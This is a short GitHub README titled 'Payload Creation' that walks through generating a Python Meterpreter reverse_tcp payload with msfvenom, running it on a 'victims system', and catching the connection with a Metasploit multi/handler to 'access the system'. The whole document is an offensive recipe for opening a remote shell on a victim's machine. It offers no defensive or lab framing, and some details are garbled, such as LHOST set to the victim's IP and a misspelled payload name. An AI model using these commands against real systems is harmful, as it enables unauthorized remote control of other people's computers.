Skip to content

Latest commit

 

History

History
31 lines (23 loc) · 453 Bytes

READme.md

File metadata and controls

31 lines (23 loc) · 453 Bytes

Payload Creation

Installation

Msfvenom —payload=python/meterpreter/reverse_tcp LHOST=VICTIMS_IP LPORT=4444 —out=meterpreter.py

Run Payload at victims system

To run the payload at victims side

python meterpreter.py

Open hackers System

>use exploit/multi/handler 
Enter
>set PAYLOAD python/metepreter/reverse_tcp
Enter
>set LHOST 
Enter
>set LPORT
Enter
>exploit 
To run and access the system